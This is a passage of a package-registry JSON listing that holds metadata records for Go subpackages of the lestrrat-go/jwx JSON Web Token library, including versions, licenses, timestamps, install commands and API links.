pi/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fpool/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415580,"name":"github.com/lestrrat-go/jwx/x25519","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx","versions_count":45,"first_release_published_at":"2026-05-09T20:37:49.365Z","latest_release_published_at":"2026-05-09T20:37:49.365Z","latest_release_number":"v1.2.31","last_synced_at":"2026-06-12T21:17:34.204Z","created_at":"2026-05-09T20:36:46.430Z","updated_at":"2026-06-12T21:17:34.204Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/x25519","install_command":"go get github.com/lestrrat-go/jwx/x25519","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/x25519#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:46.908Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/x25519","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/x25519","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/x25519","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/x25519/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fx25519/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fx25519/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fx25519/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fx25519/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fx25519/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fx25519/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415568,"name":"github.com/lestrrat-go/jwx/internal/base64","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/internal","versions_count":50,"first_release_published_at":"2026-05-09T20:37:55.860Z","latest_release_published_at":"2026-05-09T20:37:55.859Z","latest_release_number":"v1.2.31","last_synced_at":"2026-05-09T20:37:57.107Z","created_at":"2026-05-09T20:36:42.378Z","updated_at":"2026-05-09T21:00:29.307Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/base64","install_command":"go get github.com/lestrrat-go/jwx/internal/base64","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/base64#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:43.764Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/internal/base64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/base64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/base64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/internal/base64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fbase64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fbase64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fbase64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fbase64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fbase64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fbase64/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415571,"name":"github.com/lestrrat-go/jwx/internal/json","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/internal","versions_count":46,"first_release_published_at":"2026-05-09T20:37:50.842Z","latest_release_published_at":"2026-05-09T20:37:50.842Z","latest_release_number":"v1.2.31","last_synced_at":"2026-05-09T20:37:52.345Z","created_at":"2026-05-09T20:36:42.779Z","updated_at":"2026-05-09T21:00:30.433Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/json","install_command":"go get github.com/lestrrat-go/jwx/internal/json","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/json#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:44.437Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/internal/json","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/json","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/json","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/internal/json/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fjson/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fjson/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fjson/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fjson/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fjson/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fjson/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415576,"name":"github.com/lestrrat-go/jwx/jwk","ecosystem":"go","description":"Package jwk implements JWK as described in https://tools.ietf.org/html/rfc7517","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx","versions_count":50,"first_release_published_at":"2026-05-09T20:37:59.968Z","latest_release_published_at":"2026-05-09T20:37:59.967Z","latest_release_number":"v1.2.31","last_synced_at":"2026-05-09T20:38:01.631Z","created_at":"2026-05-09T20:36:44.277Z","updated_at":"2026-05-09T21:00:28.858Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwk","install_command":"go get github.com/lestrrat-go/jwx/jwk","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwk#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:47.304Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jwk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jwk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwk/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415579,"name":"github.com/lestrrat-go/jwx/v2/jwk/internal/x509","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwk/internal","versions_count":7,"first_release_published_at":"2026-05-09T20:36:57.994Z","latest_release_published_at":"2026-05-09T20:36:57.994Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-09T20:37:01.746Z","created_at":"2026-05-09T20:36:45.657Z","updated_at":"2026-05-09T21:00:30.678Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwk/internal/x509","install_command":"go get github.com/lestrrat-go/jwx/v2/jwk/internal/x509","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwk/internal/x509#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:46.729Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwk/internal/x509","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwk/internal/x509","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwk/internal/x509","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwk/internal/x509/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk%2Finternal%2Fx509/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk%2Finternal%2Fx509/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk%2Finternal%2Fx509/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk%2Finternal%2Fx509/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk%2Finternal%2Fx509/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwk%2Finternal%2Fx509/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415574,"name":"github.com/lestrrat-go/jwx/v2/cert","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":32,"first_release_published_at":"2026-05-09T20:37:31.794Z","latest_release_published_at":"2026-05-09T20:37:31.793Z","latest_release_number":"v2.1.6","last_synced_at":"2026-06-10T23:15:44.077Z","created_at":"2026-05-09T20:36:43.441Z","updated_at":"2026-06-10T23:15:44.077Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/cert","install_command":"go get github.com/lestrrat-go/jwx/v2/cert","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/cert#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:46.362Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/cert","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/cert","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/cert","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/cert/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fcert/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fcert/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fcert/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fcert/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fcert/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fcert/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415570,"name":"github.com/lestrrat-go/jwx/internal/ecutil","ecosystem":"go","description":"Package ecutil defines tools that help with elliptic curve related\ncomputation","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/internal","versions_count":46,"first_release_published_at":"2026-05-09T20:37:52.160Z","latest_release_published_at":"2026-05-09T20:37:52.159Z","latest_release_number":"v1.2.31","last_synced_at":"2026-06-12T09:01:35.142Z","created_at":"2026-05-09T20:36:42.591Z","updated_at":"2026-06-12T09:01:35.143Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/ecutil","install_command":"go get github.com/lestrrat-go/jwx/internal/ecutil","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/ecutil#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:46.935Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/internal/ecutil","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/ecutil","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/ecutil","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/internal/ecutil/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fecutil/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fecutil/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fecutil/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fecutil/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fecutil/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fecutil/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415575,"name":"github.com/lestrrat-go/jwx/v2/internal/ecutil","ecosystem":"go","description":"Package ecutil defines tools that help with elliptic curve related\ncomputation","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/internal","versions_count":32,"first_release_published_at":"2026-05-09T20:37:35.313Z","latest_release_published_at":"2026-05-09T20:37:35.313Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-09T20:37:42.305Z","created_at":"2026-05-09T20:36:44.020Z","updated_at":"2026-05-09T21:00:30.448Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/ecutil","install_command":"go get github.com/lestrrat-go/jwx/v2/internal/ecutil","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/ecutil#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:45.557Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/internal/ecutil","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/ecutil","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/ecutil","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/internal/ecutil/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fecutil/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fecutil/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fecutil/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fecutil/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fecutil/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fecutil/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415569,"name":"github.com/lestrrat-go/jwx/internal/iter","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/internal","versions_count":50,"first_release_published_at":"2026-05-09T20:37:56.432Z","latest_release_published_at":"2026-05-09T20:37:56.431Z","latest_release_number":"v1.2.31","last_synced_at":"2026-05-09T20:37:58.030Z","created_at":"2026-05-09T20:36:42.579Z","updated_at":"2026-05-09T21:00:29.339Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/iter","install_command":"go get github.com/lestrrat-go/jwx/internal/iter","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/iter#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:43.840Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/internal/iter","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/iter","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/iter","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/internal/iter/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fiter/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fiter/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fiter/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fiter/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fiter/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fiter/codemeta","maintainers":[],"registry":{"name":"proxy.gol